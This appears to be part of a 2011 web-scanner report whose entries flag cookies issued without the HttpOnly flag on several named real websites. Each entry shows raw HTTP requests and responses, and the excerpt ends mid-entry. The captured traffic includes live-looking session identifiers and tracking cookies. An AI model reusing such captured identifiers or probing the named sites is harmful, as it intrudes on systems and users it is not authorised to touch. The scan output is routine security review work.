18.212. http://www.gofileroom.com/lbmc/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/spacer.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 49
Content-Type: image/gif
Last-Modified: Thu, 21 Dec 2006 04:33:22 GMT
Accept-Ranges: bytes
ETag: "0557f25b924c71:2641"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:23:06 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3325615626.20480.0000; path=/

GIF89a
.
..........!.......,....
.
..........c+.;
18.213. http://www.gofileroom.com/lbmc/images/version.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/images/version.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc/images/version.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 1128
Content-Type: image/gif
Last-Modified: Mon, 24 Feb 2003 03:22:44 GMT
Accept-Ranges: bytes
ETag: "0dac8feb3dbc21:2b2e"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:53 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3308838410.20480.0000; path=/

GIF89al............Bp..........4f.4g.4f.5g.Bq.Oz.O{.P{.]..j..j..j..k..x..x..............................................................................................................................
...[SNIP]...
18.214. https://www.gofileroom.com/lbmc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gofileroom.com
Path:   /lbmc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc HTTP/1.1
Host: www.gofileroom.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 154
Content-Type: text/html
Location: http://www.gofileroom.com/lbmc/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:04 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3090734602.20480.0000; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.gofileroom.com/lbmc/">here</a></body>
18.215. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=CmtlSK53ETcZHgriDB-KPrcYIq9G85gG74vaMFpG3yrMLEAEoCFDfqbpvYMmGhYmIpIQQoAGP6qf-A8gBAaoEHE_QW7OxvRjgkifIV2wfVC2zy5B2Km58w4dIoj0&num=4&val=ChAwNzcyYzlkNWVmMTNhYWFmENGWre0EGggqEVIDOkXbNyABKAAwj6b1wsnDmv3hATiKiMPtBECsupLuBA&sig=AGiWqtwHRiQKdl4DfCwkNa9UWnY-WtwZ9A&adurl=http://www.firehost.com/secure-hosting/pci%3F_kk%3DPCI%2520compliance%2520scanning%26_kt%3D538c084f-5d5b-43c7-83f9-c71a7300c9e6 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CnxDbXRsU0s1M0VUY1pIZ3JpREItS1ByY1lJcTlHODVnRzc0dmFNRnBHM3lyTUxFQUVvQ0ZEZnFicHZZTW1HaFltSXBJUVFvQUdQNnFmLUE4Z0JBYW9FSEVfUVc3T3h2Umpna2lmSVYyd2ZWQzJ6eTVCMkttNTh3NGRJb2owEhMIvIyKytXUqAIVA3HlCh3PRfx8GAEgmcy4y4iX48YpSAE; expires=Mon, 06-Jun-2011 01:15:57 GMT; path=/pagead/conversion/1070200079/
Cache-Control: private
Location: http://www.firehost.com/secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 07 May 2011 01:15:57 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block

18.216. http://www.googleadservices.com/pagead/conversion/1065139613/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1065139613/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1065139613/?random=1304749011486&cv=6&fst=1304749011486&num=1&fmt=3&value=0&label=GQcuCK-1nAIQnfvy-wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=9&u_nmime=45&url=http%3A//www.secureworks.com/compliance/comp/pci.html%3F_kk%3D6713825b-9989-43cb-8a7b-5c5635138b40%26_kt%3D6426467207%26gclid%3DCMm21t3V1KgCFcPd4AodU3_CiA HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=Cn1DU1dOa0s1M0VUY1pIZ3JpREItS1ByY1lJcjd1TGl3S2ZyWWFzR042bzBZWURFQWNvQ0ZDQ3MtVGZCV0RKaG9XSmlLU0VFS0FCbmZ2eS13UElBUUdxQkJ4UDBIdXo4YjRZN3BJbnlGZHNIMVF0czh1UWRpcHVmTU9IU0tJMRITCMm21t3V1KgCFcPd4AodU3_CiBgBIOCZgpHHkfrfvgFIAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Sat, 07 May 2011 01:24:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: Conversion=Cn1DU1dOa0s1M0VUY1pIZ3JpREItS1ByY1lJcjd1TGl3S2ZyWWFzR042bzBZWURFQWNvQ0ZDQ3MtVGZCV0RKaG9XSmlLU0VFS0FCbmZ2eS13UElBUUdxQkJ4UDBIdXo4YjRZN3BJbnlGZHNIMVF0czh1UWRpcHVmTU9IU0tJMRITCMm21t3V1KgCFcPd4AodU3_CiBgAINGvkamxuMGK_QFIAQ; expires=Mon, 06-Jun-2011 01:16:38 GMT; path=/pagead/conversion/1065139613/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1065139613/?random=1304749011486&cv=6&fst=1304749011486&num=1&fmt=3&value=0&label=GQcuCK-1nAIQnfvy-wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=9&u_nmime=45&url=http%3A//www.secureworks.com/compliance/comp/pci.html%3F_kk%3D6713825b-9989-43cb-8a7b-5c5635138b40%26_kt%3D6426467207%26gclid%3DCMm21t3V1KgCFcPd4AodU3_CiA&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;
18.217. http://www.googleadservices.com/pagead/conversion/1070200079/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1070200079/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1070200079/?random=1304748964322&cv=6&fst=1304748964322&num=1&fmt=3&value=0&label=1IP6CJvekQIQj-qn_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=9&u_nmime=45&url=http%3A//www.firehost.com/secure-hosting/pci%3F_kk%3DPCI%2520compliance%2520scanning%26_kt%3D538c084f-5d5b-43c7-83f9-c71a7300c9e6%26gclid%3DCLyMisrV1KgCFQNx5Qodz0X8fA HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.firehost.com/secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CnxDbXRsU0s1M0VUY1pIZ3JpREItS1ByY1lJcTlHODVnRzc0dmFNRnBHM3lyTUxFQUVvQ0ZEZnFicHZZTW1HaFltSXBJUVFvQUdQNnFmLUE4Z0JBYW9FSEVfUVc3T3h2Umpna2lmSVYyd2ZWQzJ6eTVCMkttNTh3NGRJb2owEhMIvIyKytXUqAIVA3HlCh3PRfx8GAEgmcy4y4iX48YpSAE

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Sat, 07 May 2011 01:18:16 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: Conversion=CnxDbXRsU0s1M0VUY1pIZ3JpREItS1ByY1lJcTlHODVnRzc0dmFNRnBHM3lyTUxFQUVvQ0ZEZnFicHZZTW1HaFltSXBJUVFvQUdQNnFmLUE4Z0JBYW9FSEVfUVc3T3h2Umpna2lmSVYyd2ZWQzJ6eTVCMkttNTh3NGRJb2owEhMIvIyKytXUqAIVA3HlCh3PRfx8GAAg5fr7n8Sz3JIbSAE; expires=Mon, 06-Jun-2011 01:15:57 GMT; path=/pagead/conversion/1070200079/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1070200079/?random=1304748964322&cv=6&fst=1304748964322&num=1&fmt=3&value=0&label=1IP6CJvekQIQj-qn_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=9&u_nmime=45&url=http%3A//www.firehost.com/secure-hosting/pci%3F_kk%3DPCI%2520compliance%2520scanning%26_kt%3D538c084f-5d5b-43c7-83f9-c71a7300c9e6%26gclid%3DCLyMisrV1KgCFQNx5Qodz0X8fA&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;
18.218. http://www.harrisconnect.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harrisconnect.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.harrisconnect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:29:08 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: 59a8502f7c514423253397178054cd73=f98d5af64433bfc43e8b8e87421201e4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: JATheme=ja_mageia; expires=Wed, 25-Apr-2012 17:29:10 GMT; path=/
Set-Cookie: ColorCSS=red; expires=Wed, 25-Apr-2012 17:29:10 GMT; path=/
Set-Cookie: ScreenType=wide; expires=Wed, 25-Apr-2012 17:29:10 GMT; path=/
Set-Cookie: FontSize=3; expires=Wed, 25-Apr-2012 17:29:10 GMT; path=/
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 06 May 2011 17:29:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 32407


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang=
...[SNIP]...
18.219. http://www.hunton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:25:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1838; path=/
Set-Cookie: PortletId=5975402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=idrgpo55lx2dglzrv5uxvf55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private, no-store
Expires: Fri, 06 May 2011 23:25:55 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 236078
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>

...[SNIP]...
18.220. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1&ts=1304742546021.591&lc=about%3Ablank&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=News%20%26%20Events%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None&h1websection=news HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:29:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Set-Cookie: ASP.NET_SessionId=3hyr4u552ykd2s45ytqhjh31; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 766
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...
18.221. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1&ts=1304742418094.778&lc=http%3A%2F%2Fwww.hunton.com%2Fnews%2FuniGC.aspx%3FxpST%3DPENSearch&rf=http%3A%2F%2Fwww.hunton.com%2F&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=News%20%26%20Events%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None&h1websection=news HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363; sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1857; PortletId=5994402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:27:18 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 857


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...
18.222. http://www.hunton.com/FCWSite/Include/autocomplete.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/autocomplete.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/autocomplete.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 846
Content-Type: text/css
Last-Modified: Tue, 22 Mar 2011 21:57:06 GMT
Accept-Ranges: bytes
ETag: "0656b15dce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:34 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

.ac_results {
   padding: 0px;
   border: 1px solid black;
   background-color: white;
   overflow: hidden;
   z-index: 99999;
   color:#666;
   text-align: left;
}

.ac_results ul {
   width: 100%;
   list
...[SNIP]...
18.223. http://www.hunton.com/FCWSite/Include/footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/footer.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/footer.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1303
Content-Type: text/css
Last-Modified: Tue, 22 Mar 2011 21:57:06 GMT
Accept-Ranges: bytes
ETag: "0656b15dce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:30:01 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/*********************************************
                   FOOTER
*********************************************/
div.footerB {}
div.footerA {}
div.footer {background-color:#fff;border-top:1px solid #ddd
...[SNIP]...
18.224. http://www.hunton.com/FCWSite/Include/footer_web.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/footer_web.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/footer_web.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1013
Content-Type: text/css
Last-Modified: Tue, 22 Mar 2011 21:57:06 GMT
Accept-Ranges: bytes
ETag: "0656b15dce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:32 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

.../*********************************************
                   FOOTER
*********************************************/
div.footerB {margin:0;padding:55px 0 50px 0;}
* html div.footerB {padding-top:48px;}
d
...[SNIP]...
18.225. http://www.hunton.com/FCWSite/Include/general_web.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/general_web.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/general_web.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 73553
Content-Type: text/css
Last-Modified: Fri, 06 May 2011 20:28:18 GMT
Accept-Ranges: bytes
ETag: "fc6fd3222cccc1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:33 GMT
